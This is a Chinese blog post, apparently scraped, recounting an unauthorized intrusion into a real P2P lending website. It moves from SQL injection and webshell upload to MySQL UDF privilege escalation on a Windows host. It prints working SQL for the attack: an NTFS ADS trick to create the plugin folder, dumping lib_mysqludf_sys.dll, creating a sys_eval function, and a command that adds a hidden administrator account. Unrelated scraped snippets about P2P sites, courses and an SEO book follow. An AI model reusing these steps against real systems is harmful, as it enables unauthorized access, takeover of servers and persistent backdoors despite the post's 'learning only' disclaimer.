实战入侵某P2P网站

  #切勿玩火,本次测试。未动任何数据资料。仅为技术学习。

#0x1:扫描,Getshell

这次主要是回忆录,因为为了这个站,被吓的不要不要的了。深度怀疑入侵的是蜜罐。但是正际要深入,管理员发现了.故不由得停止步伐。

起因,一个安全交流群发出该注入点,称注入不出来。我便帮忙给测试一下。

http://www.xx.com/xx.php?c=3

顺利注入出,检测出来还是root权限。

在url后添加特殊字符,便轻易的爆出来该站的绝对路劲,使用file写入webshell。如此顺利的拿到了webshell。

#0x2:提权服务器

C盘全盘不可读不可写,数据库方面实在无奈。把完整的步骤给大家吧。让大家有所学。

因最初没看C盘,不知道C盘是否可读可写。然后直接奔数据库。

第一思路就是使用“UDF提权

上一个UDF.PHP

然后顺利连接到数据库,到处udf.dll(PS:这里没注意,导出dll的地址。UDF.PHP给导出成了c:windowssystem32udf.dll)

然后使用以下mysql命令创建一个cmdshell

create function cmdshell returns string soname ‘udf.dll‘;

可是一直出错。并且提示

数据库查讯出错,请检查SQL语句create function cmdshell returns string soname ‘udf.dll’的语法是否正确。Function ‘cmdshell’already exists

心中懊恼,Tell me why。

作为贵州大山里的一名新手司机而言这无疑是难啊。于是就百度了。

创建plugin文件夹,可以用<NTFS ADS流>来进行突破新建文件夹,这是群里冰河同学分享的笔记,笔记如下。特别感谢哈。

/*
某些情况下,我们会遇到Can‘t open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,但是默认情况下plugin不存在,怎么办? 还好有大牛研究出了利用NTFS ADS流来创建文件夹的方法
select @@basedir;   //查找mysql的目录
select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION‘;    //使用NTFS ADS流创建lib目录
select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION‘; //利用NTFS ADS再次创建plugin目录
执行成功以后再进行导出即可。
*/

然而最终依旧是失败的。愿意就是我上面说的。

dll的导出地址是错误的。

后来大贵州的我,机智的我发现了这一问题。

便将目录修改为“c:\\windows\\system32\\udf.dll”

OK,如此就顺利又突破了一个小难题。但是依旧最后的执行cmdshell的时候,依旧错误。并且最后拿下的时候udf.dll也没能成功导入。(PS:此时我发现了问题,C盘全盘不可读不可写。但其实这也是一个错误的发现。因为root的权限其实就可以说是system权限。)

然后我放弃了这条路。因为C盘没辙,数据库文件都在C盘

然后在看到了一个程序“filezzia” 这是一款FTP管理软件,之前使用XAMPP的时候用过。

于是就科普了一下百度。此Ftp阔不阔一提权。

于是找到了一篇相关的文章:http://www.myhack58.com/Article/html/3/8/2011/31520.htm

可是呢,我也下载了filezilla来看看默认的安装目录,

管理员密码以及端口都是保存在FileZilla Server Interface.xml文件里的

那么问题的关键来了,fiilezilla特么的是安装在C盘了。这就尴尬了。

补丁也是蛮多的。是一台阿里云主机,又开启了360.这就尴尬了。至此提权一筹莫展。拿起在上房屋建组构造课的时候一直在思索,exp连最新的即i个都倍无奈。怎叫老夫何以下手呀。

然后让学习交流群里的几位大牛尝试一下,可是呢,皆以无果告终。后来我的表哥告诉我。root就是system权限!

那么问题的关键来了。为啥会system了还创建不了cmdshell函数呢?tell why???

原因很简单那。TMD就是管理员禁用了cmdshell函数。行吧。那咱就用sys_eval函数。cmdshell同sys_eval函数的功能一样。

create function sys_eval returns string soname ‘udf.dll‘;
create table a (cmd LONGBLOB);

insert into a (cmd) values (hex(load_file(‘D:\\Program Files\\MySQL\\MySQL Server 5.0\\Lib\\Plugin\\lib_mysqludf_sys.dll‘))); 

SELECT unhex(cmd) FROM a INTO DUMPFILE ‘c:\\windows\\system32\\udf.dll‘;

create function sys_eval returns string soname ‘udf.dll‘

select sys_eval(‘net user xishaonian$ zhenxishaonianshi! /add & net localgroup administrator xishaonian$ /add‘);

最终就宣告成功拿下服务器。

时间: 2024-10-11 23:26:18

实战入侵某P2P网站的相关文章

搜易贷、钱多多、礼德财富这3家p2p网站技术(皮肤架构性能安全)之比较

搜易贷.钱多多.礼德财富同属p2p网站,也同为自己研发的网站. 下面从美观设计,架构设计,性能安全设计来了解下 美观设计:一般网民从皮肤来观察,会觉得搜易贷优于后面2家,嗯,作为专业人士大多也会这么认为的,但专业人士还有这样的体会,毕竟老牌搜狐创新方面还是强些,更客观更符合人性. 架构设计:应用层3家都采用的是mvc的模式,应用后台也采用的是java,(抛开分布式高性能高可用性等架构设计外)比较而言,搜易贷更合理更科学,这里要说的是,搜易贷是搜狐技术团队的原班人马及搜狐长年积累的技术标准,因此在

【课程分享】深入浅出微信公众平台实战开发(微网站、LBS云、Api接口调用、服务号高级接口)

深入浅出微信公众平台实战开发(微网站.LBS云.Api接口调用.服务号高级接口) 课程下载地址:链接:http://pan.baidu.com/share/link?shareid=2214724072&uk=3611155194 密码:glvc 一.本课程是怎么样的一门课程(全面介绍) 1.1.课程的背景 微信公众平台的火热程度已经不用多言,无论是个人还是企业,政府还是商家,都已经开始搭建微信公众平台,微信的作用已经被各界人士认可.微信公众平台的技术需求市场缺口巨大. 1.2.课程内容简介 本

再论:p2p风控是p2p网站的核心——这又是一个文盲式屁话

全国上下,从政府到民间,所谓的专家和投资人基本都认为,p2p风控是p2p理财网站的核心,经过近来本人热心关注和常年互联网经验,我认为这又是一个文盲式屁话! 说出这样的话,基本上是不懂互联网的人或者是懂又不懂的那种"庸才",都被定性的思维模式和传统的观念束缚了. 在互联网思维中,风控只是互联网经营中重要的一个环节,而不是核心和重心. 如果非要说核心的话,那可以片面的说下,p2p理财模式和经营模式或者更确切的说人才模式才是核心. 互联网的基因是什么,她与生俱来就伴随着高风险高回报高损失而产

HDInsight-Hadoop实战(一)网站日志分析

HDInsight-Hadoop实战(一)网站日志分析 简介 在此示例中,你将使用分析网站日志文件的 HDInsight 查询来深入了解客户使用网站的方式.借助此分析,你可查看外部网站一天内对该网站的访问频率以及用户体验的网站错误总结. 在此教程中,你将学习如何使用 HDInsight: 连接到包含网站日志文件的 Azure Storage Blob 创建配置单元表以查询这些日志 创建配置单元查询以分析数据 使用 Microsoft Excel 连接到 HDInsight(使用 ODBC 连接)

SEO实战密码——60天网站流量提高20倍(第3版)——互动出版网

这篇是计算机类的优质推荐>>>><SEO实战密码--60天网站流量提高20倍(第3版)> 编辑推荐 本书不仅对需要做SEO的人员有帮助,如个人站长.公司SEO或网络营销人员.SEO服务公司人员等,对所有从事与网站相关工作的人都有参考价值,如网站设计人员.程序员.大中专院校网络营销和电子商务专业学生.网络公司技术和营销团队.传统商业公司电子商务团队.新媒体营销从业人员等. 内容简介 本书是畅销书升级版,详细和系统地介绍了正规.有效的SEO实战技术,包括为什么要做SEO.搜

SEO实战密码——60天网站流量提高20倍

这篇是计算机类的优质预售推荐>>>><SEO实战密码--60天网站流量提高20倍(第3版)> 编辑推荐 本书不仅对需要做SEO的人员有帮助,如个人站长.公司SEO或网络营销人员.SEO服务公司人员等,对所有从事与网站相关工作的人都有参考价值,如网站设计人员.程序员.大中专院校网络营销和电子商务专业学生.网络公司技术和营销团队.传统商业公司电子商务团队.新媒体营销从业人员等. 内容简介 本书是畅销书升级版,详细和系统地介绍了正规.有效的SEO实战技术,包括为什么要做SEO

Django高级实战 开发企业级问答网站

第1章 Django高级实战-开发企业级问答网站课程项目结合:需求分析/Django高级用法/算法/设计模式/TestCase测试/云计算服务.本章将具体介绍课程的学习内容和目标,描述问答网站的业务场景.用途.重要性.实用性.学习本课程需要具备的知识,项目使用的技术栈,重难点:让同学们对课程的技术范畴,广度和难度有心理准备.演示网站的所有功能,结果导向,一目了然.... 第2章 Django项目的一些最佳实践最佳实践目的是使生产或管理实践的结果达到最优,并减少出错的可能性.本章讲的一些实践方法在

黑客是怎样入侵你的网站的

这个问题很难回答,简单的来说,入侵一个网站可以有很多种方法.本文的目的是展示黑客们常用的扫描和入侵网站的技术. 假设你的站点是:hashlinux.com 让我们来ping一下这个服务器: 我们得到了一个IP地址:173.236.138.113 – 这是我们目标服务器的IP地址. Sameip.org 可以帮助我们找到其他与这个服务器绑定的域名 Same IP 26 sites hosted on IP Address 173.236.138.113 有26个站点在这台服务器上(173.236.

项目实战---模拟站酷网站

开发工具:WebStorm 涉及技术:HTML+CSS+JS+JQ+VUE+Element 项目描述:本项目是根据站酷(https://www.zcool.com.cn/)的布局样式/交互效果等作为依据模拟开发的一个实战项目: 主要模拟开发了首页,发现,同城,登录,注册等页面: 实现的效果主要有: 导航条下拉菜单,图片轮播,图片无缝滚动, 页面数据用vue动态渲染,监听页面滚动实现导航条吸顶, 点击换一换实现内容切换,基于Element组件实现内容分页,表单验证等: 项目总结:通过这次的项目实战